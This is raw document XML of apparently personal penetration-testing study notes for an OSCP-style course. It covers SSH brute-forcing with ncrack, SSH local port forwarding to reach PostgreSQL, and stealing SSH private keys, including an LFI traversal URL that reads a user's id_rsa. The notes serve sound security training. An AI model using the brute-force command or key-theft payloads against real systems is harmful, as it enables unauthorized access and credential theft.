        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3528037" cy="2084003"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="210" name="image200.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image200.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3528037" cy="2084003"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I then moved Max's 'id_rsa' key into my SSH folder on /home/kali/.ssh/ in preperation for connecting to SC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once completed connect by SCP and transfer over the wrapper file on our desktop to the max .ssh directory.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9vfgq5vqnomj" w:id="110"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce SSH with username and password list</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ncrack -vvv ssh://192.168.213.125:22 -U users.txt -P passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a single username, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C9E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a single password, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_173ufmbqg9a0" w:id="111"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information about Local Port Forwarding can be found in OSCP notes found </w:t>
      </w:r>
      <w:hyperlink r:id="rId264">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and in chapter "19.3.1. SSH Local Port Forwarding"</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t xml:space="preserve">What is Local Port Forwarding in SSH?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local port forwarding in SSH allows you to forward a port from a remote machine to your local machine through an encrypted SSH connection. This lets you access services on the remote machine (like PostgreSQL, which is only accessible locally) as if they were running on your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your case, you'll forward the PostgreSQL port (5432) from the remote machine to your local machine, so you can interact with it using tools like psql installed locally.</w:t>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t xml:space="preserve">How Local Port Forwarding Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You Forward: A port on your local machine (e.g., localhost:5432).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To Target: A port on the remote machine (e.g., 127.0.0.1:5432 for PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the SSH connection is established, requests to your local port (e.g., localhost:5432) are securely forwarded to the remote machine's port.</w:t>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t xml:space="preserve">How to Set Up Local Port Forwarding</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Run the SSH Command with Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your local machine, run:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -L 5432:127.0.0.1:5432 christine@&lt;remote_ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specifies the port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The local port on your machine (you'll connect to this port). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can pick any port you want for this local port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it doesn't matter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The target port on the remote machine where PostgreSQL is listening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">christine@&lt;remote_ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replace &lt;remote_ip&gt; with the SSH address of the remote machine.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Keep the SSH Session Open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the SSH connection is established, keep the terminal session open, as it acts as the forwarding tunnel. If you close the SSH session, the forwarding will stop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Access PostgreSQL Locally</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, on your local machine, you can interact with PostgreSQL as if it's running on localhost:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h localhost -p 5432 -U postgres</w:t>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1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o68uen423khc" w:id="112"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing SSH keys</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="926"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always remember to put a trailing line at the end of private key if you copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="926"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always put </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before you run it!</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jzsyrftvgg8r" w:id="113"/>
      <w:bookmarkEnd w:id="113"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing SSH keys via LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw one example of stealing SSH keys using LFI in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId265">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DVR4</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t xml:space="preserve">From the OSCP course (in section 9.1.2. Identifying and Exploiting Directory Traversals), we learned about how we can use LFI to steal SSH and how to format it:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SSH keys are usually located in the home directory of a user in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder. Fortunately for us, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also contains the home directory paths of all users, as shown in Figure 6. The output of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a user called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let's specify a relative path for the vulnerable "page" parameter to try and display the contents of the user's private key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 8 - Entire URL of our Directory Traversal attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CCF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's copy the shown URL from listing 8 into the address bar of our browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2959100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 7: Content of SSH Private Key" id="247" name="image261.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 7: Content of SSH Private Key" id="0" name="image261.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId266"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2959100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
